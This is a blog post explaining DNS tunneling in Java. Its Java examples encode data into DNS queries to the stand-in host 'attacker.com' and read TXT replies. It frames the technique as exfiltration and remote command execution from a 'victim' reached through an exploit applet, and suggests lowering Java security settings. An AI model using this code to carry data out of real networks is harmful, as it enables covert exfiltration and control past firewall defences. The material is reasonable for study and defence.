DNS tunneling may help you bypass a firewall if DNS requests are allowed. Or it can just get you free Wi-Fi. There are a number of standalone tools that let you set up a TCP-over-DNS tunnel. Here is a simple implementation of DNS tunneling in pure Java. It is not ready for real-world use, but it shows how DNS tunneling can be implemented. The implementation works with a standard JRE and doesn't require any additional library.

What is DNS tunneling?

The purpose of the DNS (Domain Name System) protocol is to map a domain name to an IP address. DNS resolution is usually recursive: if a DNS server doesn't know how to resolve a name, it asks other DNS servers on the client's behalf. Let's assume you are in a private network with a firewall that blocks all connections to the Internet, or you have just connected to a Wi-Fi hotspot that doesn't let you reach the Internet either. Another possible situation is that we managed to deliver an exploit (for example, a Java applet) to a computer in a private network. The exploit gives us access to a machine in the internal network, but we can't establish a normal TCP connection to it because of the corporate firewall. If the firewall blocks ordinary TCP/UDP connections to machines outside the private network but allows DNS requests, then it may be possible to establish a DNS tunnel that carries data out of the private network.

Let's say we have a client inside the private network and a server outside it. There is a firewall that blocks all connections to the Internet except DNS requests. Now we want to establish a DNS tunnel between the client and the server. The server runs its own DNS server, which is authoritative for a domain (let's say 'attacker.com'). The private network has its own internal DNS server. The client wants to send data to the server. To do that, the client encodes the data in Base32 and builds a hostname from it. Base32 is a good fit because hostnames are case-insensitive and may only contain letters, digits and hyphens, so the alphabet of a Base32 string survives the trip through any resolver. For example, the string 'hello' becomes 'NBSWY3DP', so the client builds the hostname 'NBSWY3DP.attacker.com'. Then the client asks the internal DNS server to resolve this hostname. The internal DNS server has no answer for it, so it forwards the request to the DNS server responsible for 'attacker.com', which is ours. The firewall is fine with DNS requests. The server decodes the data from the Base32-encoded label, processes it, and sends a DNS response that carries data for the client in a TXT record. Two practical limits follow from the DNS format: a single label can hold at most 63 characters and the whole name at most 253, so longer payloads have to be split across several labels or several queries, and every query name must be unique, otherwise the internal resolver answers from its cache and the server never sees it.
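The encoding step described above, as an added example that is not part of the post or of the linked java-dns-tunneling project. It packs a payload into Base32 labels under the hypothetical zone attacker.com on the client side and unpacks the name again on the server side. It goes slightly beyond the 'hello' case in the text: it splits longer payloads into 63-character labels, drops the '=' padding that Base32 would normally add (not legal in a hostname), and tolerates a resolver that changes the case of the labels.

```java
import java.io.ByteArrayOutputStream;
import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import java.util.Locale;

/**
 * Added example (not the post's or the linked project's code): client-side
 * packing of a payload into a query name and server-side unpacking.
 */
public class DnsNameCodec {

    // Hypothetical zone the tunnel server is authoritative for (name taken from the post).
    static final String ZONE = "attacker.com";
    // RFC 1035 limits: 63 octets per label, 253 octets for the whole name.
    static final int MAX_LABEL = 63;
    static final int MAX_NAME = 253;

    private static final String ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567";

    /** RFC 4648 Base32 without '=' padding ('=' is not allowed in a hostname). */
    static String base32(byte[] data) {
        StringBuilder out = new StringBuilder();
        int buffer = 0, bits = 0;
        for (byte b : data) {
            buffer = (buffer << 8) | (b & 0xff);
            bits += 8;
            while (bits >= 5) {
                out.append(ALPHABET.charAt((buffer >> (bits - 5)) & 0x1f));
                bits -= 5;
            }
            buffer &= (1 << bits) - 1;          // keep only the bits not yet emitted
        }
        if (bits > 0) {                          // final partial group, zero-filled on the right
            out.append(ALPHABET.charAt((buffer << (5 - bits)) & 0x1f));
        }
        return out.toString();
    }

    /** Inverse of base32(); accepts lower case because DNS labels are case-insensitive. */
    static byte[] unbase32(String text) {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        int buffer = 0, bits = 0;
        for (char c : text.toUpperCase(Locale.ROOT).toCharArray()) {
            int value = ALPHABET.indexOf(c);
            if (value < 0) {
                throw new IllegalArgumentException("not a Base32 character: " + c);
            }
            buffer = (buffer << 5) | value;
            bits += 5;
            if (bits >= 8) {
                out.write((buffer >> (bits - 8)) & 0xff);
                bits -= 8;
                buffer &= (1 << bits) - 1;
            }
        }
        // Fewer than 8 leftover bits are the encoder's zero fill and are discarded.
        return out.toByteArray();
    }

    /** Client side: Base32 text split into labels of at most 63 characters, then the zone. */
    static String encodeName(byte[] payload) {
        String text = base32(payload);
        StringBuilder name = new StringBuilder();
        for (int i = 0; i < text.length(); i += MAX_LABEL) {
            name.append(text, i, Math.min(text.length(), i + MAX_LABEL)).append('.');
        }
        name.append(ZONE);
        if (name.length() > MAX_NAME) {
            throw new IllegalArgumentException("payload does not fit in one query name: "
                    + name.length() + " > " + MAX_NAME);
        }
        return name.toString();
    }

    /** Server side: check the zone, join the labels and decode. */
    static byte[] decodeName(String name) {
        if (name.endsWith(".")) {                // fully qualified form as seen on the wire
            name = name.substring(0, name.length() - 1);
        }
        String suffix = "." + ZONE;
        if (!name.toLowerCase(Locale.ROOT).endsWith(suffix)) {
            throw new IllegalArgumentException("not under " + ZONE + ": " + name);
        }
        String data = name.substring(0, name.length() - suffix.length()).replace(".", "");
        return unbase32(data);
    }

    public static void main(String[] args) {
        // Constructed sample: the post's own 'hello' example.
        byte[] payload = "hello".getBytes(StandardCharsets.UTF_8);
        String name = encodeName(payload);
        System.out.println(name);
        System.out.println(new String(decodeName(name), StandardCharsets.UTF_8));

        // Constructed sample: 100 bytes span three labels; a resolver may lowercase them.
        byte[] big = new byte[100];
        for (int i = 0; i < big.length; i++) {
            big[i] = (byte) i;
        }
        String bigName = encodeName(big).toLowerCase(Locale.ROOT);
        System.out.println(Arrays.equals(big, decodeName(bigName)));
    }
}
```

With a 253-octet name and the 13 octets taken by '.attacker.com', a single query carries at most about 145 bytes of payload, so a real client has to chunk its data and add a sequence number or nonce to each name to defeat resolver caching.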

Implementation of DNS tunneling with Java

The standard JRE supports the DNS protocol out of the box, through JNDI (Java Naming and Directory Interface), so no third-party library is required. In other words, if an attacker could deliver a Java applet to a target machine, the chances of successfully setting up a DNS tunnel are quite good (although with recent Java versions it is no longer as easy to make a victim run a malicious applet as it used to be).
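The client's half of one round trip using only the JDK's JNDI DNS provider, as an added example that is not part of the post or of the linked java-dns-tunneling project. It sends a query for a name that already carries encoded data (the post's 'NBSWY3DP.attacker.com'; the zone is hypothetical) and returns whatever TXT strings come back. The resolver argument and the timeout values are assumptions for the example; when no resolver is given, the JNDI DNS provider uses the platform's configured name servers, which in the scenario above is the internal resolver that recurses to the attacker's zone on the client's behalf.

```java
import java.util.ArrayList;
import java.util.Hashtable;
import java.util.List;
import javax.naming.NamingException;
import javax.naming.directory.Attribute;
import javax.naming.directory.Attributes;
import javax.naming.directory.DirContext;
import javax.naming.directory.InitialDirContext;

/**
 * Added example (not the post's or the linked project's code): resolve the
 * TXT records of a tunnel query name with nothing but the JDK's JNDI DNS provider.
 */
public class JndiTxtQuery {

    /**
     * Returns the TXT strings for {@code name}. A null {@code resolver} means
     * "use the platform's name servers", which is what an applet inside the
     * private network would do; otherwise a host name or IP address of a resolver.
     */
    static List<String> queryTxt(String name, String resolver) throws NamingException {
        Hashtable<String, String> env = new Hashtable<>();
        env.put("java.naming.factory.initial", "com.sun.jndi.dns.DnsContextFactory");
        if (resolver != null) {
            env.put("java.naming.provider.url", "dns://" + resolver);
        }
        // Assumed tuning for the example: fail fast if the firewall silently drops the packet
        // instead of waiting through the provider's default retries.
        env.put("com.sun.jndi.dns.timeout.initial", "2000");
        env.put("com.sun.jndi.dns.timeout.retries", "1");

        DirContext ctx = new InitialDirContext(env);
        try {
            // Ask for TXT only; the answer is what the tunnel server puts in the response.
            Attributes attrs = ctx.getAttributes(name, new String[] {"TXT"});
            Attribute txt = attrs.get("TXT");
            List<String> values = new ArrayList<>();
            if (txt != null) {
                for (int i = 0; i < txt.size(); i++) {
                    values.add(String.valueOf(txt.get(i)));
                }
            }
            return values;
        } finally {
            ctx.close();
        }
    }

    public static void main(String[] args) throws NamingException {
        // Query name carrying the Base32 payload "hello", as in the post; zone is hypothetical.
        String name = args.length > 0 ? args[0] : "NBSWY3DP.attacker.com";
        String resolver = args.length > 1 ? args[1] : null;
        for (String value : queryTxt(name, resolver)) {
            System.out.println("TXT: " + value);
        }
    }
}
```

The provider class com.sun.jndi.dns.DnsContextFactory ships with the JDK (in the jdk.naming.dns module from Java 9 on), so this compiles against a plain JDK. A name that does not exist raises a NamingException (NameNotFoundException), which a tunnel client should treat as "no data for me yet" rather than as a fatal error.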

Here is an example which shows an idea how DNS tunneling can be implemented with Java:

https://github.com/artem-smotrakov/java-dns-tunneling

It's just a proof of concept and not ready for real-world use. Here are the main points:

The "src" directory contains the Java sources:

The "scripts" directory contains some useful scripts:

manifest.mf is the manifest file for the jar. It contains the "Permissions" attribute, which newer Java versions require before they will run an applet.

DNS tunnel testing

I used a couple of VMs for testing:

As a result, I could type commands in the DNSTunnelServer console, and those commands were sent to and run on the 'victim' machine.

I hope you use the latest Java version. If so, you will need to change the Java plugin's security settings to be able to run the applet (you will probably need to lower the security level and add 'attacker.com' to the exception site list).

This project requires Java 8 or higher (it uses some APIs introduced in Java 8, and fancy stuff like lambdas), but it shouldn't be hard to adapt it to older Java versions.

Originally published at https://blog.gypsyengineer.com on August 29, 2016.
